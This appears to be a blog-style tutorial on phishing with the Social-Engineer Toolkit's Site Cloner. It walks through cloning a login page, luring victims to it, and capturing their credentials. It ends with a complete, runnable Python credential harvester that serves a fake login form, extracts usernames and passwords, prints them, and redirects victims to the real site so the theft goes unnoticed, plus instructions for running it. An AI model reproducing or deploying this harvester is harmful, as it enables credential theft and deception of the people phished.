
Credential Harvesting

This is a very simple yet effective technique that uses the Social-Engineer Toolkit (SET), which comes pre-installed on Kali Linux.

I spun up my attacking machine and opened SET to configure the attack, then picked a specific target login page that I was going to replicate.

I then opened the Social-Engineering Attacks menu, selected Website Attack Vectors, chose the Credential Harvester Attack Method and picked the Site Cloner option.

The goal here is to CLONE the target's login page and serve the copy from my own machine.

I set my Kali Linux machine's IP address as the address the cloned form posts back to, which makes it the listening harvester. Everything submitted to the clone is printed in my terminal.


Next I entered the address of the target login page, and SET copied the entire page, including the login form, with the form rewritten to post back to my machine.

The cloned site is now served from my Kali VM's IP. When is this useful? Whenever the target can be tricked into following a link to the clone instead of the original, for example from a phishing e-mail, or when the clone is used as a lure on public Wi-Fi. The uses are vast. One caveat worth keeping in mind: the victim's address bar shows my IP over plain HTTP rather than the real domain over HTTPS, so the attack depends on the victim not looking closely at the address bar.

When a user tries to log in, they enter the username and password they normally use. The cloned form posts those values to my machine, and SET prints every submitted field to my terminal.

The user sees what looks like a failed login attempt, because SET immediately redirects them to the original login page that I cloned.

From there they can log in successfully, since they are no longer on my fake login page, and most users will assume they simply mistyped their password.

Meanwhile the credentials have been harvested and displayed in my terminal, as you can see. :) When you are finished, pressing Ctrl-C tells SET to write the captured data to a report.
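To make the mechanism concrete, here is a minimal harvester written for this page (an added example, not SET's own code or the author's): it serves a constructed stand-in for the cloned login form, captures any POSTed fields the way SET does, guesses which of them hold the username and password, prints them, and 302-redirects the victim to the original login URL so they land on the real page. `ORIGINAL_LOGIN_URL`, `LISTEN_ADDR`, the stand-in form and the field-name hints are all assumptions; a real run would use the target's cloned HTML with its form action rewritten to point at this server.

```python
"""Minimal credential harvester mirroring SET's Site Cloner flow.

Added example for this page, not code from SET or the original author.
ORIGINAL_LOGIN_URL, LISTEN_ADDR, CLONED_PAGE and the hint lists are assumed.
"""
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

# Hypothetical target; in SET this is the URL you gave the Site Cloner.
ORIGINAL_LOGIN_URL = "https://login.example.com/"
# SET binds to the harvester IP you entered; 0.0.0.0 listens on all interfaces.
LISTEN_ADDR = ("0.0.0.0", 8080)

# Constructed stand-in for the cloned page (a real clone is the target's HTML).
CLONED_PAGE = """<!doctype html>
<html><body>
<h1>Sign in</h1>
<form method="post" action="/">
  <label>Username <input name="username"></label>
  <label>Password <input name="password" type="password"></label>
  <button type="submit">Log in</button>
</form>
</body></html>
"""

# Substrings used to guess which form fields carry the username and password.
USER_HINTS = ("user", "login", "email", "uname", "uid")
PASS_HINTS = ("pass", "pwd", "passwd")

HARVESTED = []  # every captured submission, in order


def parse_post_body(raw):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    parsed = parse_qs(raw.decode("utf-8", "replace"), keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def classify_fields(fields):
    """Return ((name, value) or None) for the username and password fields.

    Password hints are checked first so "login_password" lands in the
    password slot rather than matching the "login" username hint.
    """
    user = pwd = None
    for name, value in fields.items():
        lowered = name.lower()
        if pwd is None and any(h in lowered for h in PASS_HINTS):
            pwd = (name, value)
        elif user is None and any(h in lowered for h in USER_HINTS):
            user = (name, value)
    return user, pwd


def harvest(fields, client_ip):
    """Record one submission and return the structured record."""
    user, pwd = classify_fields(fields)
    record = {
        "client": client_ip,
        "username": user[1] if user else None,
        "password": pwd[1] if pwd else None,
        "all_fields": dict(fields),
    }
    HARVESTED.append(record)
    return record


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the cloned login page to anyone who follows the lure link.
        body = CLONED_PAGE.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        # Capture the submitted form, print it, then bounce the victim to the
        # genuine login page so they see what looks like a failed attempt.
        length = int(self.headers.get("Content-Length") or 0)
        fields = parse_post_body(self.rfile.read(length))
        record = harvest(fields, self.client_address[0])
        print("[*] WE GOT A HIT from", record["client"], record["all_fields"])
        self.send_response(302)
        self.send_header("Location", ORIGINAL_LOGIN_URL)
        self.send_header("Content-Length", "0")
        self.end_headers()


def serve():
    print("[*] Harvester listening on %s:%d" % LISTEN_ADDR)
    ThreadingHTTPServer(LISTEN_ADDR, HarvesterHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Run it with `python3 harvester.py`, browse to `http://<attacker-ip>:8080/`, and submit the form: the fields are printed to the terminal and the browser is redirected to `ORIGINAL_LOGIN_URL`, exactly the sequence the victim experiences with SET. The redirect is what makes the failure look like a typo; without it the victim would sit on a page that never logs them in.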